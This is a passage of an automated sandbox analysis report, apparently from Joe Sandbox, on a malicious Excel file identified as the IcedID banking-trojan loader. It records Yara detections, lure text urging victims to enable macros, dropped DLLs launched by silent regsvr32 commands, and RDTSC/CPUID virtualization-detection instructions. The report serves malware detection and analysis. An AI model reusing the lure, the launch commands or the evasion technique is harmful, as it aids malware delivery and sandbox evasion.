        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2102480631.0000000000333000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3036, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1916, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3028, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00311678 NtQuerySystemInformation,3_2_00311678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02141678 NtQuerySystemInformation,4_2_02141678
        Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_005A1678 NtQuerySystemInformation,5_2_005A1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003118103_2_00311810
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB15D03_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB41BF3_2_000007FEF8FB41BF
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_021418104_2_02141810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F915D04_2_000007FEF8F915D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F941BF4_2_000007FEF8F941BF
        Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_005A18105_2_005A1810
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: 5.2.regsvr32.exe.b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.2140000.4.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 5.2.regsvr32.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.310000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 5.2.regsvr32.exe.b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000003.00000002.2087735512.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000005.00000002.2102346921.00000000000B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2094984722.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@15/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Formtofill4184860.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Formtofill4184860.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: Formtofill4184860.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: Formtofill4184860.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: Formtofill4184860.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: XRAY.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00311E50 3_2_00311E50
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02141E50 4_2_02141E50
        Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_005A1E50 5_2_005A1E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000311E71 second address: 0000000000311E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000311EAB second address: 0000000000311EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002141E71 second address: 0000000002141E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002141EAB second address: 0000000002141EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000005A1E71 second address: 00000000005A1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
